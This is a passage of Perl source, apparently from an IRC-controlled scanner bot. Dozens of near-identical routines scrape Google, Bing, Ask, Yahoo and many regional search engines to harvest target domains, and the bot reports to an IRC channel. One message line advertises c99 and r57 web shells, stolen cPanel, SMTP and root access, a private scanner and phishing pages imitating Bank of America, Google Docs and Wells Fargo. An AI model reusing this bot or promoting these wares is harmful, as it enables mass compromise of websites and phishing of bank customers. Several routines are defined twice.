m/<a class=\"resultDisplayUrl\" (.*) site=\"_blank\">(.+?)<\/a>/g) { my $link = $2; if ($link!~ /dogpile/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub infocom() { my @list; my $key = $_[0]; for ($b = 1; $b<=600; $b+=41) { my $search = ("http://www.info.com/searchw?page=".$b."&qkw=".uri_escape($key)); my $res = search_engine_query($search); while ($res =~ m/http%3a%2f%2f(.+?)%2f/g) { my $link = $1; if ($link!~ /info\.com/) { my @grep=links($link); open( $filez, ">>", $name ); foreach my $k (@grep) { print $filez "$k\n"; } close $filez; push(@list,@grep); } } } return @list; } sub searchcom() { my @list; my $key = $_[0]; for ($b = 1; $b<=400; $b+=40) { my $search = ("http://www.search.com/search?q=".uri_escape($key)."&nav=".$b.".10.2.10"); my $res = search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick=\"/g) { my $link = $1; if ($link!~ /search\.com/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub teoma() { my @list; my $key = $_[0]; for ($b = 1; $b<=600; $b+=50) { my $search = ("http://www.teoma.com/web?q=".uri_escape($key)."&page=".$b); my $res = search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\"/g) { my $link = $1; if ($link!~ /teoma\.com/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub volunia() { my @list; my $key = $_[0]; my $chan = $_[1]; for ($b = 1; $b<=600; $b+=40) { my $search = ("http://www.volunia.com/find/web?q=".uri_escape($key)."&start=".$b); my $res = search_engine_query($search); while ($res =~ m/The map of http:\/\/(.+?) does not exist yet/g) { my $link = $1; if ($link!~ /volunia\.com/) { my @grep = &links($link); push(@list,@grep); } } } sendraw("MODE $chan -m"); return @list; } sub izito() { my @list; my $key = $_[0]; for ($b=0; $b<=600; $b+=40) { my $search = ("http://www.izito.com/?query=".uri_escape($key)."&where=web_izito&site=web_izito&vid=l1847521836I1359583892&con=y&asid=1810073229&tag=7570085394I1359583978&clt=topic&sr=r&pg=".$b); my $res = search_engine_query($search); while ($res =~ m/<div class=\"title_up\"><a href=\"http:\/\/(.*?)\" site=/g) { my $link = $1; if ($1 !~ /izito\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub onyet() { my @list; my $key = $_[0]; for ($b=1; $b<=420; $b+=30) { my $search = ("http://szukaj.onet.pl/0,".$b.",query.html?qt=".uri_escape($key)); my $res = search_engine_query($search); while ($res =~ m/class=\"link\"><a href=\"http:\/\/(.+?)\">/g) { if ($1 !~ /onet\.pl/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub askom() { my @list; my $key = $_[0]; for (my $i=0; $i<=400; $i+=30) { my $search = ("http://www.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=&o=0&l=dir&qid=235A0A59C3E13CDAFE9BC30D9C40E125&page=".$i."&pid=&min=&max=&jss="); my $res = search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) { if ($1 !~ /ask\.com/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=600; $i+=500){ my $search = ($jack9.uri_escape($key)."&num=100&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub walla() { my @list; my $key = $_[0]; my $chan = $_[1]; for ($b=0; $b<=1000; $b+=61) { my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /walla\.co\.il/){ my @grep = &links($link); push(@list,@grep); } } } sendraw("MODE $chan -m"); return @list; } sub yahoo(){ my @list; my $key = $_[0]; for ($b=1; $b<=100; $b+=10) { my $search = ("http://search.yahoo.com/web?fr=".uri_escape($key)."&b=".$b); my $res = &search_engine_query($search); while ($res =~ m/http:\/\/([^>]*)\//g) { my $link = $1; if ($link !~ /yahoo\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub ask() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=100) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss="); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /ask\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list; my $key = $_[0]; my $b = 0; for ($b=1; $b<=600; $b+=60) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=600; $b+=60) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=600; $i+=60) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub sapo(){ my @list; my $key = $_[0]; for ($b=1; $b<=700; $b+=40) { my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local"); my $res = &search_engine_query($search); if ($res !~ m/Next/i) {$b=50;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /\.sapo\.pt/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub lycos() { my @list; my $key = $_[0]; for ($b=0; $b<=500; $b+=50) { my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b); my $res = &search_engine_query($search); while ($res =~ m/title=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /lycos\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub uol() { my @list; my $key = $_[0]; for ($b=0; $b<=1000; $b+=100) { my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b); my $res = &search_engine_query($search); if ($res =~ m/retornou nenhum resultado/i) {$b=500;} while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=500; $b+=50) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=500; $b+=50) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=500; $b+=50) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=50) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = &search_engine_query($search); while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) { my $link = $1; if ($link !~ /biglobe/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub yahoo2() { my @list; my $key = $_[0]; my $b = 0; my @doms = ("nl","au","br","ca","de","es","fr","it","uk"); foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))]; for (my $i=1; $i<=1000; $i+=50) { my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i); my $res = &search_engine_query($search); while ($res =~ m/http:\/\/([^>]*)\//g) { if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); } } } return @list; } } sub kvasir() { my @list; my $key = $_[0]; for (my $i=10; $i<=1000; $i+=100){ my $search = ("http://www.kvasir.no/nettsok?q=".$i."&pageSize=100&q=".uri_escape($key).""); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\//g) { my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } } return @list; } sub quint() { my @lst; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://quintura.com/?request=".uri_escape($key)."&tab=0&page=".$i."&tabid="); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) { my $link = $1; if ($link !~ /quintura/){ my @grep = links($link); push(@lst,@grep); } } } return @lst; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=1000; $b+=100) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) { if ($1 !~ /seznam/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub pagina(){ my @list; my $key = $_[0]; my $i = 0; for ($i=0; $i<=500; $i+=30){ my $web=("http://startgoogle.startpagina.nl/index.php?q=".uri_escape($key)."&start=".$i."&origin=homepage&source=geentaal"); my $Res= search_engine_query($web); while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ if ($1 !~ /pagina|pagina's/){ my $k=$1; my @grep=links($k); push(@list,@grep); } } } return @list; } sub clix(){ my @list; my $key = $_[0]; for($b=1;$b<=1000;$b+=100){ my $Th=("http://www.google.pt/search?q=".uri_escape($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b.""); my $Res=&search_engine_query($Th); while($Res =~ m/href=\"http:\/\/(.+?)\//g){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); } } return @list; } sub ask2() { my @list; my $key = $_[0]; for (my $i=1; $i<=50; $i+=1) { my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all"); my $res = &search_engine_query($search); if ($res !~ /Successiva/) {$i=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) { if ($1 !~ /ask\.com/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack1() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack1.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack2() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack2.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack3() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack3.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack4() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack4.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack5() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack5.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack6() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack6.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack7() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack7.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack8() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack8.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack9() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack9.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack10() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jack10.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub askCA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://ca.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askCA\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub askDE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://de.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askDE\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askIT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askIT\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askUK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askUK\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askFR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://fr.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askFR\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askES() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://es.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askES\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askRU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://ru.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askRU\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub askNL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://nl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askNL\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askPL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://pl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askPL\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askAT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://at.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askAT\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askSE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://se.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askSE\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askDK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://dk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askDK\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askNO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://no.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askNO\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub askAU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://au.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askAU\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askBR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://br.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askBR\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askMX() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://mx.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askMX\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub askJP() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=30) { my $search = ("http://jp.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askJP\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list; my $key = $_[0]; my $b = 0; for ($b=1; $b<=500; $b+=50) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=500; $b+=50) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bingDE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=de&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingDE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub bingUK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=uk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingUK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ca&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCA/) { my @grep = links($link); push(@list,@grep); } } } &msg("$channel","3,115[4Notices15]8 Need4 :9 /.Shell c99 & r57.\./.cPanel.\./.SMTP.\./.Root.\./.VPN Premium 1 Years.\./.FTP.\./.Private Scanner.\./.SCAMPAGE ( BOA , GOOGLGEDOCS , WELLSFARGO ECT.\.13 Contact Us4 : 4 *9 icq 4:8 704359286 4 *9 Site4 :8 http://mytoolsbox.com"); return @list; } sub bingBR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=br&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingFR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=fr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingFR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingES() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=es&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingES/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=it&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(4); sub bingBE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=be&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nl&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pt&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=no&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingDK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=dk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingDK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingSE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=50) { my $search = 